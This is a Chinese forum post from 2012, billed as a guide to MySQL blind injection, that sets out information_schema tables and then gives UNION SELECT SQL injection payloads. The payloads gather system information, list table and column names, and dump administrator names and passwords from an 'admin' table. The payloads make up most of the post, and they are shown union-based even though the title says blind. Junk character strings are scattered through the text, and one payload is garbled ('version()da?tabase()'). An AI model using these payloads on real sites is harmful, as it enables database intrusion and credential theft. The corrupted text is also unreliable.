本文介绍MYSQL盲注的一些语句和方法
+ N9 s- Z) o4 ]# p- s) O3 m: Z# {5 ?
学习盲注前先了解下 IFORMATION_SCHEMA 库) p( d) V8 ] E9 |+ }1 O5 ]# ]
, v, a& }3 ?8 [1 f0 Q
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有$ `& d4 [" k0 Y. f2 j
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
5 ?: M0 M4 N9 D9 v0 N1.得到所有数据库名:: N: G- ^ ~9 z8 G4 t$ _* J7 d, f
|SCHEMATA ->存储数据库名的表9 l o5 ^! j" i9 j" Q" M
|---字段:SCHEMA_NAME ->数据库名称8 i% o! C# |( ~ ~( \
/ |; g7 i) D( U* e
|TABLES ->存储表名* w }: A( @! E q7 l7 Y
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
+ N* t: F# I1 ~0 M|---字段:TABLE_NAME ->存储表的表名
% G8 w7 K# j7 b& P5 W4 g: w R* `
- V* R1 H1 Q' U' D% R|COLUMNS ->存储的字段名表6 f3 a/ {0 c5 K; c) C
|---字段:TABLE_SCHEMA ->该字段所属数据库名6 r& O+ ^$ I5 I$ R5 v; `
|---字段:TABLE_NAME ->存储所属表的名称
: N% c F h! b0 k, Q& e I' {: p& B
|---字段:COLUMN_NAME ->该字段的名称
B: w8 v+ ^- O! M: r; e
! S! F5 n0 n Y ; _' X% m, N" U) K) g8 t' O" i2 i
9 e# d6 ^$ ]7 A6 v9 h5 S% D8 N' j
###########################################################################
2 V; c- h' n4 Q% d# h4 x
2 V S. R) E+ \+ K z0x001 获取系统信息:* m# U+ y, _% z7 b, ^/ y: J# C
0 s% y: n3 @5 Z# Q
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*$ v; k+ m/ g: f. Q2 s6 _
% j* ^; g4 x8 a$ U/*5 I8 Y- O$ a: \9 v3 V
3 b: P2 j9 }0 [5 H5 ^
@@global.version_compile_os 获取系统版本5 H, O& x4 H: }4 p
" n9 v# p: U7 u5 I+ l
@@datadir 数据库路径
, ~ Z+ l$ N3 A3 Pdatabase() 当前数据库名称
% S+ J6 ]. C i/ r: Z' c- ^9 m0x3c62723e 换行HEX值1 u& g4 m9 }- ^) E1 p
, B4 f% x1 `/ ]8 y5 l) U# Y4 E
*/
8 o% {) ?7 A1 f$ N7 I- j& o4 D% u) d( W: N
+ p+ n/ @, R% N0 ?, S% m- s" a
- T# B* ^0 w( h( R
######################################################################6 ~0 q$ G3 I1 B# m+ w- w
( a4 ~% r# Q1 h. s0x002 获取表名
- ?: A/ O+ r% b2 F. ]/ P# j J
# n- Z# s1 q! f5 `4 d' Junion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*. ]) x; r# h/ R- }
. P3 G# u( ?& {$ K% K) D 3 T# k2 Y% c3 q: m6 K3 O
$ \9 a: ]+ |; \3 I- ^2 Y- h/*
2 Z: Y+ \5 m/ f8 L# Y' j9 o
6 X. g- N5 ?" b- s9 |" e. V* A7 B: n0x67617264656e 为当前数据库名- E3 R# C0 r5 z" X' e
2 E o! x; ?4 D. Rgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名9 C, ^! z0 b& Q+ z. s
( P4 i$ G( J$ x- v! ?# \! D
*/
+ Z0 O0 U" k1 O d5 ?" L0 M2 w2 D. v! i
######################################################################! W5 Q$ U! h+ S# L) `
- r; W+ ^1 k0 x2 r
; M# m' c! @' P3 A, t2 v4 c1 u+ e
0x003 获取字段+ S, s$ \' F" D& J
6 S$ F! l7 w4 |union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
+ m/ j- l9 I" e% L) i$ l1 r
: d1 f1 h/ i# T/*
5 c: c `: f! c- ~& ]
' M/ @' t- ^8 I. S) k0 p! Ogroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
% b& p. f7 z% K" ~9 d' C C* _% o7 H X, H1 m
0x61646d696e ->选择一个表* P+ J) T( {+ V% @( c
8 `1 h& r% h: E0x67617264656e ->数据库名5 c$ ? P j. c& q' }. ]! W( ?
* [/ \/ v* @7 c {) b$ R. s* d* I D*/
5 s2 R, \6 Q6 V {6 W. S% f4 O6 N; u, Z& D. f# s4 L- [/ k
#####################################################################$ n* f7 z9 v4 G+ I
% t; p; H7 D j* a 0 w0 ]% S% z5 G6 s j4 Q% f( r
9 c) B6 T# a S2 u5 ]0x004 获取数据8 s5 f. K0 ~( M2 r$ i: h
+ s5 J8 b& E/ y1 Tunion select 1,2,35 W% b3 c( k! y B, u" }5 z
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin Z$ j/ M8 U* a/ B1 [; k7 \, H
7 Z/ M, F. [+ h& A1 ^
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
9 M( c7 a- R0 V! F- a
* {+ g3 k' I% K( ]
$ Z. m2 A4 o8 t$ }: K0 k( n2 P) c( e+ \9 V/ b/ j4 M$ \
/*
9 y/ }- E% }7 M/ D4 I+ a9 H' X* g; P* h$ e5 S) B
0x3c62723e 换行符号HEX编码
2 j( G5 s% w+ u3 g" y- ` Q% K& t1 J- `& [0 h4 O
group_concat 同时获得该字段所有数据% m3 |4 m8 }3 d3 L, `' ]2 @
) p* ~+ b. f& C) j% E: j2 o6 O% \
*/; h n+ u4 S2 o, O
K$ H: A1 u& h
|
发表于 2012-9-13 17:48:44
收藏
支持
反对